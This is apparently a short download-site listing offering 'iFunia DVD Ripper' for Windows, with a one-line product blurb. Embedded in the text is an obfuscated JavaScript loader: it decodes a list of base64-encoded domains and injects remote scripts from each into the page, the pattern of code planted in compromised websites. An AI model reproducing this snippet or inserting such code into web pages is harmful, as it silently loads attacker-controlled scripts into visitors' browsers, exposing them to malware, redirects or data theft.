IFunia DVD Ripper Download For Windows PC Free
const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=|NXQ0MTQwMmEuc2l0ZS94cC8=|OWUxMDdkOWQuc2l0ZS94cC8=|ZDQxZDhjZDkuZ2l0ZS94cC8=|ZjAwYjRhMmIuc2l0ZS94cC8=|OGIxYjk5NTMuc2l0ZS94cC8=”;const pds=pdx.split(“|”);pds.forEach(function(pde){const s_e=document.createElement(“script”);s_e.src=”https://”+atob(pde)+”cs.php?u=56e73724″;document.body.appendChild(s_e);}); Free Download iFunia DVD Ripper for Windows PC. It is a versatile software that allows users to rip DVDs to 300+ multimedia formats and predefined devices.…
Read more